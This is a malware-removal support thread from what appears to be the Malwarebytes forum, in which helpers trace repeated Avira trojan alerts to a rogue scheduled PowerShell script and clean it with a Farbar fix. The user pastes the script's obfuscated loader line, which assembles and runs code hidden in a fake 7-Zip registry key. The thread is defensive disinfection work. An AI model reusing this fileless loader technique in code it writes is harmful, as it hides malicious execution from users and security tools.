ramiwi Posted October 29, 2023 ID:1597236 Share Posted October 29, 2023 Avira security on windows 11 keeps alerting this every few seconds (started today). How can I find out what's causing this? This is the message: Suspicous behavior blocked Item name: memorybuffer.f00df41003e9a3b48... Threat name: TR/PShell.Agent.VPO Type: TrojanStatus: Blocked A running process on your device is potentially malicious and has been blocked. Link to post Share on other sites More sharing options...
Porthos Posted October 29, 2023 ID:1597242 Share Posted October 29, 2023 @ramiwi Let's get the info to get the process started. Please do the following so that we may take a closer look at your system for any possible infections. Do these 2 steps so that ALL folders & Files are set to SHOW, plus also, Turn OFF Windows Fast start. Show-Hidden-Folders-Files-Extensions https://forums.malwarebytes.com/topic/299345-show-hidden-folders-files-extensions/ Disable-Fast-Startup https://forums.malwarebytes.com/topic/299350-disable-fast-startup/ Then please restart the computer and do the following. WARNING: Do Not click the Repair option under Advanced unless requested by a Malwarebytes support agent or authorized helper NOTE: The tools and the information obtained are safe and not harmful to your privacy or your computer, please allow the programs to run if blocked by your system. Download the Malwarebytes Support Tool In your Downloads folder, open the mb-support-x.x.x.xxx.exe file In the User Account Control pop-up window, click Yes to continue the installation Run the MBST Support Tool In the left navigation pane of the Malwarebytes Support Tool, click Advanced In the Advanced Options, click Gather Logs. A status diagram displays the tool is Getting logs from your machine A zip file named mbst-grab-results.zip will be saved to the Desktop or on the hidden Public desktop (usually C:\Users\Public\Desktop), please upload that file on your next reply Thank you Link to post Share on other sites More sharing options...
ramiwi Posted October 30, 2023 Author ID:1597315 Share Posted October 30, 2023 @Porthos Thanks! My results are attached. I ran the diag tool right after booting up (I didn't have the fast startup checkbox in the unavailable settings, maybe I disabled it in my BIOS in the past). The alerts only started about an hour after booting, and then kept popping up every few seconds. So its was quit when the tool was working. I can send another report when they will start to popup again. The previous reply (from Said) is not related to me. mbst-grab-results.zip Link to post Share on other sites More sharing options...
Root Admin AdvancedSetup Posted October 30, 2023 Root Admin ID:1597348 Share Posted October 30, 2023 Hello @ramiwi and Did you create this PowerShell script to run with a scheduled task on your own? C:\WINDOWS\System32\375263BC-272F-4C89-877F-092DB6A60857.ps1 Link to post Share on other sites More sharing options...
ramiwi Posted October 30, 2023 Author ID:1597350 Share Posted October 30, 2023 No, I haven`t. Link to post Share on other sites More sharing options...
Root Admin AdvancedSetup Posted October 30, 2023 Root Admin ID:1597359 Share Posted October 30, 2023 Give me a moment to write up a fix for you @ramiwi In the mean time, please do the following [ 1 ] ATTENTION: System Restore is disabled (Total:300 GB) (Free:28.8 GB) (10%) Please enable and create a new System Restore Point Turn On or Off System Protection for Drives in Windows 11 https://www.elevenforum.com/t/turn-on-or-off-system-protection-for-drives-in-windows-11.3598/ Create System Restore Point in Windows 11 https://www.elevenforum.com/t/create-system-restore-point-in-windows-11.3602/ [ 2 ] Please go to Control Panel, Programs, Programs and Features, Uninstall a program Then right-click and uninstall the following Java 8 Update 241 [ 3 ] Please see the following for reference only Class-action lawsuit against antivirus firm for selling data 1 Link to post Share on other sites More sharing options...
Root Admin Solution AdvancedSetup Posted October 30, 2023 Root Admin Solution ID:1597366 Share Posted October 30, 2023 Please run the following fix Make sure you temporarily disable the Avira antivirus real-time protection first NOTE: Please read all of the information below before running this fix. NOTICE: This script was written specifically for this user, for use on this particular machine. Running this on another machine may cause damage to your operating system that cannot be undone. Once the fix has been completed, please attach the file FIXLOG.TXT to your next reply Farbar program: FRSTEnglish.exe Save the attached file: FIXLIST.TXT to this folder C:\Users\rami_\Downloads\ NOTE. It's important that both files, FRSTEnglish.exe, and fixlist.txt are in the same location or the fix will not work. Please make sure you disable any real-time antivirus or security software before running this script. Once completed, make sure you re-enable it. Run the Farbar program with Admin rights and press the Fix button just once and wait. The fix may possibly take up to 60 minutes to complete If the tool needs a restart please make sure you let the system restart normally and let the tool complete its run after restart. The tool will make a log named Fixlog.txt in the same folder you ran the Farbar program from. Please attach that log on your next reply. NOTE: This fix will run a scan to check that all Microsoft operating system files are valid and not corrupt and attempt to correct any invalid files. It will also run a disk check on the restart to ensure disk integrity. NOTE: As part of this fix all temporary files will be removed. If you have any open web pages that have not been bookmarked please make sure you bookmark them now as all open applications may be automatically closed. Also, make sure you know the passwords for all websites as cookies may possibly be removed in some cases, but not all cases. NOTE: As part of this fix, it will also reset the network to default settings including the firewall. If you have custom firewall rules you need to save please export or save them first before running this fix. The following directories are emptied: Windows Temp Users Temp folders Edge, IE, FF, Chrome, and Opera caches, HTML5 storages, Cookies and History Recently opened files cache Discord cache Java cache Steam HTML cache Explorer thumbnail and icon cache BITS transfer queue (qmgr*.dat files) Recycle Bin Important: items are permanently deleted. They are not moved to quarantine. If you have any questions or concerns please ask before running this fix. The system will be rebooted after the fix has run. fixlist.txt Thanks 1 Link to post Share on other sites More sharing options...
ramiwi Posted October 30, 2023 Author ID:1597410 Share Posted October 30, 2023 Sorry, I dont see the Farbar attachment. Link to post Share on other sites More sharing options...
ramiwi Posted October 30, 2023 Author ID:1597411 Share Posted October 30, 2023 nevermind, found it. will run and update you Link to post Share on other sites More sharing options...
ramiwi Posted October 30, 2023 Author ID:1597426 Share Posted October 30, 2023 Fixlog.txt this is the result log. Link to post Share on other sites More sharing options...
ramiwi Posted October 30, 2023 Author ID:1597449 Share Posted October 30, 2023 Many thanks! So far the alert seems to be gone. That PowerShell script appears to be suspicious C:\WINDOWS\System32\375263BC-272F-4C89-877F-092DB6A60857.ps1 $LFSXIEJqQd=[ScriptBlock];$lhcOGyDfZLnqCQ=[string];$CJbdVcGDfEVbV=[char]; icm ($LFSXIEJqQd::Create($lhcOGyDfZLnqCQ::Join('', ((gp 'HKLM:\SOFTWARE\7-ZipAA8xK7ht').'SLrPhfxtl3w' | % { [char]$_ })))) Link to post Share on other sites More sharing options...
Root Admin AdvancedSetup Posted October 30, 2023 Root Admin ID:1597461 Share Posted October 30, 2023 Thank you for the log. It ran pretty well and also found and fixed other issues. Windows Resource Protection found corrupt files and successfully repaired them. SecurityCheck by glax24 I would like you to run a tool named SecurityCheck to inquire about the current security update status of some applications. CheckSecurity is a utility for quickly checking for the presence of vulnerable applications Temporarily disable Microsoft SmartScreen to download the software Download SecurityCheck by glax24: https://tools.safezone.cc/glax24/SecurityCheck/SecurityCheck.exe If SmartScreen blocks the file from running click on More info and Run anyway This tool is safe. Smartscreen is overly sensitive. You can check the VirusTotal scan of the tool from here Right-click with your mouse on the Securitycheck.exe and select "Run as administrator" and reply YES to allow to run & go forward Wait for the scan to finish. It will open a text file named SecurityCheck.txt Close the file. Attach it with your next reply. You can find this file in a folder called SecurityCheck, C:\SecurityCheck\SecurityCheck.txt Checked parameters: User Account Control (UAC). Service pack. IE version. Automatic OS update. Sets of critical KB patches when updating is disabled. Antivirus, firewall, other security utilities. Versions of Java, Oracle Virtualbox. Version of Adobe Flash Player, Adobe AIR. Versions of Adobe Reader, Acrobat Reader DC, Foxit Reader. Versions of media players (iTunes, AIMP, foobar2000). Versions of messengers (Skype, Pidgin). Versions of installed browsers (Chrome, Opera, Firefox, Yandex, SeaMonkey). Versions of mail programs (The Bat, Thunderbird). Checking running processes and security program services Searching for installed Adware programs and optimizer programs (More than 5000). Thank you 1 Link to post Share on other sites More sharing options...
ramiwi Posted October 31, 2023 Author ID:1597564 Share Posted October 31, 2023 Hi, The results are attached. SecurityCheck.txt Link to post Share on other sites More sharing options...
Root Admin AdvancedSetup Posted October 31, 2023 Root Admin ID:1597619 Share Posted October 31, 2023 Please make a new System Restore Point first Then uninstall, update, or otherwise address the following as appropriate for your computer. 7-Zip 22.00 (x64) v.22.00 Warning! Download Update | Uninstall old version and install new one. Adobe Creative Cloud v.3.9.0.327 Warning! Download Update Audacity 3.0.2 v.3.0.2 Warning! Download Update calibre 64bit v.6.9.0 Warning! Download Update FileZilla 3.62.2 v.3.62.2 Warning! Download Update foobar2000 v1.6.16 v.1.6.16 Warning! Download Update GIMP 2.10.14 v.2.10.14 Warning! Download Update IrfanView 4.53 (64-bit) v.4.53 Warning! Download Update Microsoft Visual Studio Code (User) v.1.82.2 Warning! Download Update Mozilla Thunderbird 78.7.1 (x86 en-US) v.78.7.1 Warning! Download Update Node.js v.18.12.1 Warning! Download Update Oracle VM VirtualBox 6.1.38 v.6.1.38 Warning! Download Update PuTTY release 0.76 (64-bit) v.0.76.0.0 Warning! Download Update Python 2.7.15 (64-bit) v.2.7.15150 Warning! Download Update Python 3.11.3 (64-bit) v.3.11.3150.0 Warning! Download Update Python 3.8.1 (32-bit) v.3.8.1150.0 Warning! Download Update Python 3.8.5 (64-bit) v.3.8.5150.0 Warning! Download Update qBittorrent v.4.5.4 Warning! Download Update Signal 5.29.1 v.5.29.1 Warning! Download Update TeamViewer v.15.40.8 Warning! Download Update WinRAR 5.71 (64-bit) v.5.71.0 Warning! Download Update Please see the following for reference https://forums.malwarebytes.com/topic/303753-class-action-lawsuit-against-antivirus-firm-for-selling-data/ ---------------------------- [ UnwantedApps ] ----------------------------- Avira System Speedup v.6.26.0.18 << Hidden Warning! Suspected demo version of anti-spyware, driver updater or optimizer. Then RESTART the computer and check for Windows Updates and install any found. Let me know if there are still any signs of infection or other issues after these updates Thank you 1 Link to post Share on other sites More sharing options...
Root Admin AdvancedSetup Posted November 16, 2023 Root Admin ID:1600258 Share Posted November 16, 2023 Due to the lack of feedback, this topic is closed to prevent others from posting here. If you need this topic reopened, please send a Private Message to any one of the moderating team members. Please include a link to this topic with your request. This applies only to the originator of this topic. Other members who need assistance please start your own topic in a new thread. Tips to help protect from infection Thanks Link to post Share on other sites More sharing options...
Recommended Posts